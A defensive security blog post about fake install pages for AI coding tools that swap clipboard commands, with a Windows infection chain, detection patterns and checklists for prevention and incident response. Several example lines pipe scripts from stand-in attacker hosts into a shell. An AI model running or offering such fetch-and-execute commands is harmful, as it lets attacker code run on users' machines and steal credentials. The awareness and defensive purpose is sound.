A practical security case study about fake AI tool install pages, clipboard command substitution, and why copy-pasting terminal commands from search results has become a real workstation risk.
Introduction
This is not a Claude vulnerability.
It is not a story about "AI tools are dangerous" either.
It is about a much more ordinary problem:
developers are used to copying install commands from the browser into the terminal
Attackers are now abusing that habit.
The old phishing pattern was familiar: a fake login page, a malicious attachment, a suspicious document, a password reset email.
The newer developer-focused pattern looks different:
fake documentation
fake install page
fake copy button
malware instead of install.sh
The victim does not need to open a suspicious attachment.
They search for an AI development tool, click a sponsored result, land on a page that looks like documentation, copy a terminal command, and run it.
It feels like installing a normal CLI tool.
But it can be the start of a malware infection chain.
The attack pattern: InstallFix
Push Security described this pattern as InstallFix.
The idea is simple:
- An attacker clones an installation page for a popular developer tool.
- The page looks close enough to legitimate documentation.
- The install commands are modified.
- Traffic is driven through Google Ads or other malvertising channels.
- The user copies and runs the command manually.
- The "installer" executes attacker-controlled code.
This is related to ClickFix, but the pretext is different.
In ClickFix, the user is often tricked into "fixing" something: a CAPTCHA, a browser issue, a broken access flow, or a fake system error.
In InstallFix, nothing is broken.
The user already wants to install legitimate software.
That is what makes the attack so effective.
Why AI tools are a good lure
AI developer tooling is moving fast.
People are installing Claude Code, ChatGPT-related tools, Cursor extensions, MCP servers, local agents, CLI wrappers, browser extensions, desktop clients, and small automation packages around LLM workflows.
In many teams, this does not always go through a formal internal approval process.
The real workflow often looks like this:
a colleague mentions a tool
someone searches for the install guide
the first result looks right
they copy the command
they run it
For an attacker, this is almost perfect:
- the tool is popular and timely;
- users expect to see terminal commands;
- sponsored results can appear above organic results;
- documentation pages are easy to imitate;
- the install command can look normal;
- the user may be redirected to a real page afterward and notice nothing.
Kaspersky and Push Security have both described campaigns where fake install pages were promoted through search ads and imitated installation instructions for Claude Code or similar AI tooling.
The important point is this:
the lure is not the AI model itself
the lure is the developer installation workflow
A realistic case: installing Claude through install.sh
Imagine a developer wants to install an AI coding assistant.
They search for:
Claude Code install
At the top of the search results, they see a sponsored link.
The domain looks plausible:
claude-code-docs.example
claude-code-install.example
claude-update.example
The page looks like documentation:
- logo;
- sidebar;
- quickstart section;
- OS tabs for macOS, Linux, and Windows;
- a copy button;
- a short terminal command.
On the page, the visible command may look like this:
curl -fsSL https://claude.ai/install.sh | sh
But the visible command and the clipboard command do not have to be the same.
For example, the page can display:
curl -fsSL https://claude.ai/install.sh | sh
But after the user clicks Copy, the clipboard may contain:
curl -fsSL https://download.example.invalid/install.sh | sh
Or:
curl -fsSL https://download.example.invalid/bootstrap | sh
In a real campaign, the attacker domain would be more convincing.
The point is not the exact URL.
The point is that the user trusts the page UI instead of verifying the pasted command before pressing Enter.
Where JavaScript comes in
Most documentation pages show a command as text and provide a Copy button.
That button can copy a value that is different from the text the user sees.
Conceptually:
visible text:
curl -fsSL https://official.example/install.sh | sh
clipboard value:
curl -fsSL https://attacker.example/install.sh | sh
An attacker can make this more subtle:
- show a legitimate-looking domain in the page;
- copy an attacker-controlled URL into the clipboard;
- add base64 decoding;
- add silent flags;
- choose payloads based on OS;
- change the command only for selected geographies or organizations;
- change the copied command only when the visit comes from an ad campaign.
So "I saw the correct command on the page" is not enough.
The only thing that matters is what is actually pasted into the terminal.
That sounds basic.
But this is exactly the kind of basic thing that breaks under speed and trust.
Windows scenario: mshta and PowerShell
On Windows, these campaigns often use living-off-the-land binaries.
A simplified infection chain can look like this:
browser / user paste
-> PowerShell
-> mshta.exe
-> remote HTA or script
-> cmd.exe or PowerShell stager
-> fileless payload
-> persistence or credential theft
In campaigns around fake Claude Code installers, researchers observed patterns involving mshta.exe, PowerShell, staged execution, obfuscation, AMSI bypass attempts, browser data theft, and infostealer behavior.
The key point is that the victim does not need to download and double-click a suspicious setup.exe.
They can run one copied command, and that command can fetch the rest.
From a detection perspective, this may look less like "a malicious file from email" and more like user-driven terminal activity.
That is why behavior matters.
macOS and Linux scenario: curl-to-shell
On macOS and Linux, the familiar pattern is:
curl -fsSL https://example.com/install.sh | sh
or:
curl -fsSL https://example.com/install.sh | zsh
This is convenient.
That is exactly why it is dangerous.
The command means:
download a remote script and execute it immediately
If the domain is official and the script is expected, this is a common developer workflow.
If the domain is replaced, this becomes remote code execution performed by the user.
The problem is not curl.
The problem is that the trust boundary becomes:
I trust this web page and its copy button
That is a weak boundary.
Why sponsored search results make this worse
Many users still treat Google Ads as a sign of legitimacy.
The mental shortcut is:
if it is at the top of Google, it is probably fine
That is a dangerous shortcut.
Malvertising works because the user initiates the search. There is no phishing email. No strange attachment. No random message from a stranger.
The user wanted to install the tool.
So they are less suspicious.
This is especially risky in a corporate environment.
A developer workstation may contain:
- source code;
- SSH keys;
- browser sessions;
- password manager sessions;
- Git credentials;
- cloud CLI tokens;
- kubeconfig files;
- CI/CD access;
- internal documentation;
- VPN access.
An infostealer on that machine is not just "one infected laptop".
It can become an entry point into the organization.
How this differs from a classic fake installer
A classic fake installer looks like this:
download setup.exe
run installer
get malware
InstallFix is more subtle.
It abuses a normal developer habit:
documentation says copy this command
I copy the command
I run the command
For a developer, this does not feel like running a random executable.
It feels like installing a CLI tool from documentation.
That is why security awareness should not stop at:
do not open suspicious executables
It also needs to say:
terminal commands copied from the browser are code execution
What to check before running install commands
A practical checklist for users:
- Do not use sponsored results to install developer tools.
- Open official documentation from a known source.
- Check the domain inside the command, not only the browser address bar.
- After pasting, read the command before pressing Enter.
- Avoid
curl | shwhen you do not understand what will be downloaded. - When possible, download the script first and inspect it:
curl -fsSL https://official.example/install.sh -o install.sh
less install.sh
sh install.sh
- Use a disposable VM or container for tools you do not trust yet.
- Do not test new AI tools on a workstation that holds production secrets.
This is not about paranoia.
It is about treating remote installation commands as code execution.
Because that is what they are.
What teams can do
Awareness alone is not enough.
I would add a few practical controls.
Maintain an approved tool list
Teams should know where approved developer tools come from.
Example:
Claude Code:
official docs: https://docs.anthropic.com/...
expected package: @anthropic-ai/claude-code
Node.js:
official site: https://nodejs.org/
internal mirror: https://nexus.example.com/...
Homebrew:
official site: https://brew.sh/
If someone finds an installation guide through a sponsored ad, that should be a reason to stop.
Provide internal installation docs
For common tools, internal documentation helps a lot.
It should answer:
- how to install the tool;
- which command is approved;
- which domain is expected;
- whether a hash or signature should be checked;
- where to ask for help if the install fails.
This matters especially for AI tools.
People will try them anyway.
If the company does not provide a safe path, employees will find an unsafe path.
Use DNS and web controls
Useful controls include blocking or flagging:
- newly registered domains;
- suspicious lookalike domains;
- known malicious domains;
- ad-delivered installer pages;
- direct access to suspicious payload hosts.
This will not stop every campaign.
Attackers rotate infrastructure quickly.
But it is still a useful layer.
Endpoint detections
On Windows, I would monitor for patterns such as:
browser -> powershell
browser -> cmd
powershell -> mshta
mshta -> cmd
mshta -> powershell
PowerShell with encoded commands
PowerShell AMSI tampering
new scheduled task near install activity
unexpected outbound traffic from scripting hosts
On macOS and Linux:
shell spawned from browser-adjacent activity
curl or wget downloading scripts to /tmp
chmod +x on a fresh download
execution from /tmp
unexpected launch agents
unexpected shell profile modification
Context matters.
curl is not malware.
PowerShell is not malware.
But a browser-driven install flow, a suspicious domain, an obfuscated command, and persistence behavior together are a different story.
Why AppSec and DevSecOps should care
At first glance, this looks like endpoint security and awareness.
But it matters for AppSec and DevSecOps too.
Developer workstations often have access to the software supply chain:
- Git repositories;
- package registries;
- container registries;
- CI/CD variables;
- deployment configuration;
- signing keys;
- cloud credentials;
- kubeconfig files.
If an infostealer gets browser sessions or local credentials, the next step can be a supply chain incident.
That is why Secure SDLC should include workstation and tooling hygiene:
- approved source lists for developer tools;
- no installation from sponsored results;
- internal installation guides;
- sandboxing for new AI tools;
- endpoint telemetry on developer machines;
- least-privilege developer tokens;
- short-lived credentials;
- separate production credentials;
- regular review of local secrets and kubeconfigs.
This is not about fighting Claude.
It is about developer workstation security.
Incident response checklist
If someone already ran a suspicious install command:
- Stop using the workstation.
- Isolate the endpoint from the network or through EDR.
- Preserve the command, URL, browser history, and time window.
- Review the process tree: browser, shell, PowerShell,
mshta.exe,cmd.exe,curl,zsh. - Check persistence: scheduled tasks, launch agents, startup items, shell profiles.
- Review outbound connections.
- Treat browser sessions and tokens as potentially compromised.
- Rotate credentials:
- Git;
- GitHub or GitLab;
- cloud;
- container registry;
- package registry;
- password manager session, if relevant.
- Review recent repository and CI/CD activity.
- Rebuild the workstation if cleanup confidence is low.
If this is an infostealer, deleting one file is not enough.
Credentials may already be gone.
What this does not solve
Checking install commands does not replace:
- endpoint protection;
- DNS filtering;
- secure web gateways;
- least privilege;
- credential rotation;
- EDR telemetry;
- software allowlisting;
- internal package mirrors;
- developer security training.
It solves one specific gap:
people should not blindly execute code from a page they reached through an ad
That gap is small, but it is real.
Closing
InstallFix is uncomfortable because it does not need a sophisticated exploit.
It abuses normal developer behavior.
We trained people to do this:
copy command from docs
paste into terminal
press Enter
Attackers replaced the docs.
Or the command.
Or the clipboard value.
That can be enough.
So the rule I use is simple:
an install command from the browser is code execution
Treat it like code:
- verify the source;
- verify the domain;
- read the command after pasting;
- do not trust sponsored results;
- do not run unknown
install.shscripts on workstations with secrets; - provide an approved internal path for popular tools.
This is a small habit.
But it can be the difference between installing a developer tool and running an infostealer on a developer workstation.
References
- Push Security, InstallFix: https://pushsecurity.com/blog/installfix/
- Kaspersky, Malware disguised as AI agents: https://www.kaspersky.com/blog/fake-ai-agents-infostealers/55412/
- Graphika, Malicious Commands: Fake Claude Code & ChatGPT Installers: https://graphika.com/posts/malicious-commands-fake-claude-code-chatgpt-installers
- TechRepublic summary: https://www.techrepublic.com/article/news-fake-claude-code-install-pages-malware-windows-macos/
Top comments (0)